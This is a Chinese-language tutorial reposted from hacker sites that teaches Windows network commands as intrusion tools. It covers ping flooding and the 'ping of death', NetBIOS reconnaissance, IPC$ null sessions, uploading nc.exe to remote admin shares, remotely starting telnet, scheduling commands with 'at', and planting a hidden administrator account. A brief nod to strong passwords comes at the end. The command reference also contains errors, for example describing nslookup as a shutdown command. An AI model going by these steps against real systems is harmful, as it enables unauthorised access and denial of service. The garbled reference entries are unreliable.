資料來源:小可電台64頻道
一,ping
它是用來檢查網絡是否通暢或者網絡連接速度的命令。
作為一個生活在網絡
上的管理員或者黑客來說,ping命令是第一個必須掌握的DOS命令,
它所利用的原
理是這樣的:網絡上的機器都有唯一確定的IP地址,
我們給目標IP地址發送一個
數據包,對方就要返回一個同樣大小的數據包,
根據返回的數據包我們可以確定
目標主機的存在,可以初步判斷目標主機的操作系統等。
下面就來看看它的一些
常用的操作。先看看幫助吧,在DOS窗口中鍵入:
ping /? 迴車,。所示的幫助畫
面。在此,我們只掌握一些基本的很有用的參數就可以了(下同)。
-t 表示將不間斷向目標IP發送數據包,直到我們強迫其停止。試想,如果你
使用100M的寬帶接入,而目標IP是56K的小貓,那麼要不了多久,目標IP就因為承
受不了這麼多的數據而掉線,呵呵,一次攻擊就這麼簡單的實現了。
-l 定義發送數據包的大小,默認為32字節,我們利用它可以最大定義到
65500字節。結合上面介紹的-t參數一起使用,會有更好的效果哦。
-n 定義向目標IP發送數據包的次數,默認為3次。如果網絡速度比較慢,3次
對我們來說也浪費了不少時間,因為現在我們的目的僅僅是判斷目標IP是否存在
,那麼就定義為一次吧。
說明一下,如果-t 參數和 -n參數一起使用,ping命令就以放在後面的參數
為標準,比如“ping IP -t -n 3”,雖然使用了-t參數,但並不是一直ping下去
,而是隻ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主機域
名,這樣就可以得到主機的IP。
下面我們舉個例子來說明一下具體用法。
這裡time=2表示從發出數據包到接受到返回數據包所用的時間是2秒,從這裡
可以判斷網絡連接速度的大小 。從TTL的返回值可以初步判斷被ping主機的操作
系統,之所以說“初步判斷”是因為這個值是可以修改的。這裡TTL=32表示操作
系統可能是win98。
(小知識:如果TTL=128,則表示目標主機可能是Win2000;如果TTL=250,則
目標主機可能是Unix)
至於利用ping命令可以快速查找局域網故障,可以快速搜索最快的QQ服務器
,可以對別人進行ping攻擊……這些就靠大家自己發揮了。
二,nbtstat
該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接,使用這個命
令你可以得到遠程主機的NETBIOS信息,比如用戶名、所屬的工作組、網卡的MAC
地址等。在此我們就有必要了解幾個基本的參數。
-a 使用這個參數,只要你知道了遠程主機的機器名稱,就可以得到它的
NETBIOS信息(下同)。
-A 這個參數也可以得到遠程主機的NETBIOS信息,但需要你知道它的IP。
-n 列出本地機器的NETBIOS信息。
當得到了對方的IP或者機器名的時候,就可以使用nbtstat命令來進一步得到
對方的信息了,這又增加了我們入侵的保險係數。
三,netstat
這是一個用來查看網絡狀態的命令,操作簡便功能強大。
-a 查看本地機器的所有開放端口,可以有效發現和預防木馬,可以知道機器
所開的服務等信息,如圖4。
這裡可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等
。用法:netstat -a IP。
-r 列出當前的路由信息,告訴我們本地機器的網關、子網掩碼等信息。用法
:netstat -r IP。
四,tracert
跟蹤路由信息,使用此命令可以查出數據從本地機器傳輸到目標主機所經過
的所有途徑,這對我們了解網絡布局和結構很有幫助。如圖5。
這裡說明數據從本地機器傳輸到192.168.0.1的機器上,中間沒有經過任何中
轉,說明這兩台機器是在同一段局域網內。用法:tracert IP。
五,net
這個命令是網絡命令中最重要的一個,必須透徹掌握它的每一個子命令的用
法,因為它的功能實在是太強大了,這簡直就是微軟為我們提供的最好的入侵工
具。首先讓我們來看一看它都有那些子命令,鍵入net /?迴車如圖6。
在這裡,我們重點掌握幾個入侵常用的子命令。
net view
使用此命令查看遠程主機的所以共享資源。命令格式為net view \\IP。
net use
把遠程主機的某個共享資源影射為本地盤符,圖形界面方便使用,呵呵。命
令格式為net use x: \\IP\sharename。上面一個表示把192.168.0.5IP的共享名
為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接(net
use \\IP\IPC$ "password" /user:"name"),
建立了IPC$連接後,呵呵,就可以上傳文件了:copy nc.exe
\\192.168.0.7\admin$,表示把本地目錄下的nc.exe傳到遠程主機,結合後面要
介紹到的其他DOS命令就可以實現入侵了。
net start
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後,如果發現它
的什麼服務沒有啟動,而你又想利用此服務怎麼辦?就使用這個命令來啟動吧。
用法:net start servername,如圖9,成功啟動了telnet服務。
net stop
入侵後發現遠程主機的某個服務礙手礙腳,怎麼辦?利用這個命令停掉就ok
了,用法和net start同。
net user
查看和帳戶有關的情況,包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳
戶、帳戶禁用等。這對我們入侵是很有利的,最重要的,它為我們克隆帳戶提供
了前提。鍵入不帶參數的net user,可以查看所有用戶,包括已經禁用的。下面
分別講解。
1,net user abcd 1234 /add,新建一個用戶名為abcd,密碼為1234的帳戶
,默認為user組成員。
2,net user abcd /del,將用戶名為abcd的用戶刪除。
3,net user abcd /active:no,將用戶名為abcd的用戶禁用。
4,net user abcd /active:yes,激活用戶名為abcd的用戶。
5,net user abcd,查看用戶名為abcd的用戶的情況
net localgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net
localgroup即列出當前所有的用戶組。在入侵過程中,我們一般利用它來把某個
帳戶提升為administrator組帳戶,這樣我們利用這個帳戶就可以控制整個遠程主
機了。用法:net localgroup groupname username /add。
現在我們把剛才新建的用戶abcd加到administrator組裡去了,這時候abcd用
戶已經是超級管理員了,呵呵,你可以再使用net user abcd來查看他的狀態,和
圖10進行比較就可以看出來。但這樣太明顯了,網管一看用戶情況就能漏出破綻
,所以這種方法只能對付菜鳥網管,但我們還得知道。現在的手段都是利用其他
工具和手段克隆一個讓網管看不出來的超級管理員,這是後話。有興趣的朋友可
以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
net time
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機
裡面,那麼也許就用不到這個命令了。但簡單的入侵成功了,難道只是看看嗎?
我們需要進一步滲透。這就連遠程主機當前的時間都需要知道,因為利用時間和
其他手段(後面會講到)可以實現某個命令和程序的定時啟動,為我們進一步入
侵打好基礎。用法:net time \\IP。
六,at
這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序(知道
net time的重要了吧?)。當我們知道了遠程主機的當前時間,就可以利用此命
令讓其在以後的某個時間(比如2分鐘後)執行某個程序和命令。用法:at time
command \\computer。
表示在6點55分時,讓名稱為a-01的計算機開啟telnet服務(這裡net start
telnet即為開啟telnet服務的命令)。
七,ftp
大家對這個命令應該比較熟悉了吧?網絡上開放的ftp的主機很多,其中很大
一部分是匿名的,也就是說任何人都可以登陸上去。現在如果你掃到了一台開放
ftp服務的主機(一般都是開了21端口的機器),如果你還不會使用ftp的命令怎
麼辦?下面就給出基本的ftp命令使用方法。
首先在命令行鍵入ftp迴車,出現ftp的提示符,這時候可以鍵入“help”來
查看幫助(任何DOS命令都可以使用此方法查看其幫助)。
大家可能看到了,這麼多命令該怎麼用?其實也用不到那麼多,掌握幾個基
本的就夠了。
首先是登陸過程,這就要用到open了,直接在ftp的提示符下輸入“open 主
機IP ftp端口”迴車即可,一般端口默認都是21,可以不寫。接著就是輸入合法
的用戶名和密碼進行登陸了,這裡以匿名ftp為例介紹。
用戶名和密碼都是ftp,密碼是不顯示的。當提示**** logged in時,就說明
登陸成功。這裡因為是匿名登陸,所以用戶顯示為Anonymous。
接下來就要介紹具體命令的使用方法了。
dir 跟DOS命令一樣,用於查看服務器的文件,直接敲上dir迴車,就可以看
到此ftp服務器上的文件。
cd 進入某個文件夾。
get 下載文件到本地機器。
put 上傳文件到遠程服務器。這就要看遠程ftp服務器是否給了你可寫的權限
了,如果可以,呵呵,該怎麼 利用就不多說了,大家就自由發揮去吧。
delete 刪除遠程ftp服務器上的文件。這也必須保證你有可寫的權限。
bye 退出當前連接。
quit 同上。
八,telnet
功能強大的遠程登陸命令,幾乎所有的入侵者都喜歡用它,屢試不爽。為什
麼?它操作簡單,如同使用自己的機器一樣,只要你熟悉DOS命令,在成功以
administrator身份連接了遠程機器後,就可以用它來**想乾的一切了。下面介紹
一下使用方法,首先鍵入telnet迴車,再鍵入help查看其幫助信息。
然後在提示符下鍵入open IP迴車,這時就出現了登陸窗口,讓你輸入合法的
用戶名和密碼,這裡輸入任何密碼都是不顯示的。
當輸入用戶名和密碼都正確後就成功建立了telnet連接,這時候你就在遠程
主機上具有了和此用戶一樣的權限,利用DOS命令就可以實現你想乾的事情了。這
裡我使用的超級管理員權限登陸的。
到這裡為止,網絡DOS命令的介紹就告一段落了,這裡介紹的目的只是給菜鳥
網管一個印象,讓其知道熟悉和掌握網絡DOS命令的重要性。其實和網絡有關的
DOS命令還遠不止這些,這裡只是拋磚引玉,希望能對廣大菜鳥網管有所幫助。學
好DOS對當好網管有很大的幫助,特別的熟練掌握了一些網絡的DOS命令。
另外大家應該清楚,任何人要想進入系統,必須得有一個合法的用戶名和密
碼(輸入法漏洞差不多絕跡了吧),哪怕你拿到帳戶的只有一個很小的權限,你
也可以利用它來達到最後的目的。所以堅決消滅空口令,給自己的帳戶加上一個
強壯的密碼,是最好的防禦弱口令入侵的方法。
資料來源:夜明之前
net user heibai lovechina /add 加一個heibai的使用者密碼為lovechina
net localgroup Administrators heibai /add 把他加入Administrator組
net start telnet 開對方的TELNET服務
net use z:\127.0.0.1c$ 映射對方的C盤
net user guest /active:yes 將Guest使用者激活
net user guest lovechina 把guest的密碼改為lovechina
net user 查看所有使用者列表
net user 使用者名 /delete 刪掉
net time \\127.0.0.1 得到對方的時間,
get c:\index.htm d:\ 上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
copy index.htm \\127.0.0.1\c$\index.htm 本地C盤下的index.htm復制到127.0.0.1的C盤
NET VIEW 顯示域列表、電腦列表或指定電腦的共
電腦運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統資訊
wiaacmgr-------掃瞄儀和照相機向導
winchat--------XP自帶局域網聊天
mem.exe--------顯示記憶體使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
net use \\ip\ipc$ " " /user:" " 建立IPC空連結
net use \\ip\ipc$ "密碼" /user:"使用者名" 建立IPC非空連結
net use h: \\ip\c$ "密碼" /user:"使用者名" 直接登陸后映射對方C:到本地為H:
net use h: \\ip\c$ 登陸后映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC連結
net use h: /del 刪除映射對方到本地的為H:的映射
net user 使用者名 密碼 /add 建立使用者
net user guest /active:yes 激活guest使用者
net user 查看有哪些使用者
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 使用者名 /add 把“使用者”添加到管理員中使其具有管理員權限,注意:administrator后加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地電腦時間與“目標IP”主電腦的時間同步,加上參數/yes可取消確認資訊
net view 查看本地局域網內開啟了哪些共享
net view \\ip 查看對方局域網內開啟了哪些共享
net config 顯示系統網絡設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 局域網內正在使用的網絡連接類型和資訊
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest使用者登陸后用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些連接埠,常用netstat -an
netstat -n 查看連接埠的網絡連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個連接埠開了的話,就可查看對方最近登陸的使用者名(03前的為使用者名)-注意:參數-A要大寫
tracert -參數 ip(或電腦名) 跟蹤路由(資料包),參數:“-w數字”用於設置超時間隔。
ping ip(或域名) 向對方主電腦送出預設大小為32位元組的資料,參數:“-l[空格]資料包大小”;“-n送出資料次數”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(送出大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置資訊
tlist -t 以樹行列表顯示進程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪 除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件,“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX資訊
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁盤碎片整理程序
diskmgmt.msc---磁盤管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網絡管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查接口
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控制程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
Nslookup-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成后出現的漫游xp程序)
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----電腦性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盤檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字符映射表
cliconfg-------SQL SERVER 客戶端網絡實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---電腦管理
cleanmgr-------**整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC資料源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機使用者和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
文章定位:
